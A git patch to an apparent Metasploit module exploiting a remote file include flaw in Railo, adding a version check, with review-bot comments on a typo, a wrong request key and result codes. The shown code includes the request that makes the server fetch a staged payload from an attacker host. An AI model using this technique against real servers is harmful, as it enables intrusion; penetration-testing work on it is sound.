From ee3e5c91596023d167e642b6b8ffb46fea3237d3 Mon Sep 17 00:00:00 2001 From: Brandon Perry Date: Tue, 2 Sep 2014 21:35:47 -0500 Subject: [PATCH] Add check method --- modules/exploits/linux/http/railo_cfml_rfi.rb | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index 407f32c8fb..5a902db02e 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -17,10 +17,10 @@ class Metasploit4 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a remote file include vulnerability in Railo, tested against version 4.2.1. First, a call using a vulnerable - line in thumbnail.cfm allows an attacker to download an - arbitrary PNG file. By appending a .cfm and taking advantage of + line in thumbnail.cfm allows an atacker to download an + arbitrary PNG file. By appending a .cfm, and taking advantage of a directory traversal, an attacker can append cold fusion markup - to the PNG file and have it interpreted by the server. This is + to the PNG file, and have it interpreted by the server. This is used to stage and execute a fully-fledged payload. }, 'License' => MSF_LICENSE, @@ -63,6 +63,13 @@ class Metasploit4 < Msf::Exploit::Remote end def check + res = send_request_cgi({ + 'url' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm') + }) + + return Exploit::CheckCode::Appears if res and res.code == 200 + + return Exploit::CheckCode::Safe end def exploit @@ -92,7 +99,7 @@ class Metasploit4 < Msf::Exploit::Remote wh = '5000' #width and height res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path + '/admin/thumbnail.cfm'), + 'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'), 'vars_get' => { 'img' => url + '/' + stager_name, 'height' => wh,
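Review bot: The reworded description misspells `attacker` as `atacker` on the first added line of the `'Description'` hunk, a typo the removed line did not have. That line should read `line in thumbnail.cfm allows an attacker to download an`; the comma changes on the other two added lines are fine as they are.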
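Review bot: The new `check` method passes its path under the key `'url'`, whereas the `send_request_cgi` call in the last hunk of this patch uses `'uri'`. If the unknown key is ignored, the probe goes to the default path rather than the stylesheet, and any host that answers 200 there is reported as `Appears`; it should be `'uri' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm')`. The result codes also overstate what the probe proves: a 200 on a static resource only shows the product is present, so `Exploit::CheckCode::Detected` fits better than `Appears`. A missing response should not fall through to `Safe`, since a timeout or filtered port says nothing about patch state; add `return Exploit::CheckCode::Unknown unless res` before the status test. As a style point, `res and res.code == 200` reads more conventionally as `res && res.code == 200`.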